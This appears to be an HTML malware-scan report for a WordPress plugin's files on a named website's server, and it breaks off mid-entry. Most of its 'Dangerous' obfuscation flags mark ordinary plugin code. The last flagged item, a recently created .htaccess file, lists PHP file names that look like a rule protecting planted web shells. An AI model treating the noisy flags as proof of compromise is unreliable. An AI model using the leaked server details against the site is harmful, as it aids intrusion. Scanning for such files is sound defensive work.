<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_single_style01</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_399").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style03.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.24 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_400" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_loop_style03</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$element </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 160</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">wp_strip_all_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_dls_03_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'shortcode'</span><span style="color: #007700">] ) ) ); </span><span style="color: #FF8000">//phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_400").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style02.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.71 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_401" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_loop_style02</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$element </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">wp_strip_all_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_dls_02_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'shortcode'</span><span style="color: #007700">] ) ) ); </span><span style="color: #FF8000">//phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_401").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_grid.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 16.81 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_402" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'woocomposer_loop_' </span><span style="color: #007700">. </span><span style="color: #0000BB">$product_style</span><span style="color: #007700">; </span><span style="color: #0000BB">$output </span><span style="color: #007700">.= </span><span style="color: #0000BB">$function</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #DD0000">'grid' </span><span style="color: #007700">); } </span><span style="color: #0000BB">$output </span><span style="color: #007700">.= </span><span style="color: #DD0000">"\n</div>'; return </span><span style="color: #0000BB">$output</span><span style="color: #DD0000">; } } new Ultimate_VC_Addons_WooComposer_GridView(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs Grid View</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer init grid</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_init_grid</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 470</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">woocomposer grid shortcode</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_grid_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 486</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'wc_print_notices' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'woocomposer_loop_' </span><span style="color: #007700">. </span><span style="color: #0000BB">$product_style</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 499</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #DD0000">'grid' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 502</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_402").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_carousel.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 20.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_403" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #FF8000">//jQuery("[data-save=true]").trigger("click"); }); </script>'; return $output; } } new Ultimate_VC_Addons_WooComposer_ViewCarousel(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs View Carousel</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer Init Carousel</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woo_composer_init_carousel</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">woocomposer grid shortcode</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woo_composer_carousel</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'wc_print_notices' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'woocomposer_loop_' </span><span style="color: #007700">. </span><span style="color: #0000BB">$product_style</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 493</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #DD0000">'carousel' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 497</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_403").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_carousel_cat.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 24.72 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_404" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_WooComposer_Cat_Carousel</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs Carousel</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer init Carousel</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_init_grid</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 418</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">woocomposer carousel shortcode</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_carousel_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_404").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/admin/.htaccess</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_405" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">comdofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">connects</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">copypaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">delpaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">doiconvs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">epinyins</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">filefuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">gdftps</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hplfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">memberfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">moddofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">onclickfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">phpzipincs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qfunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: 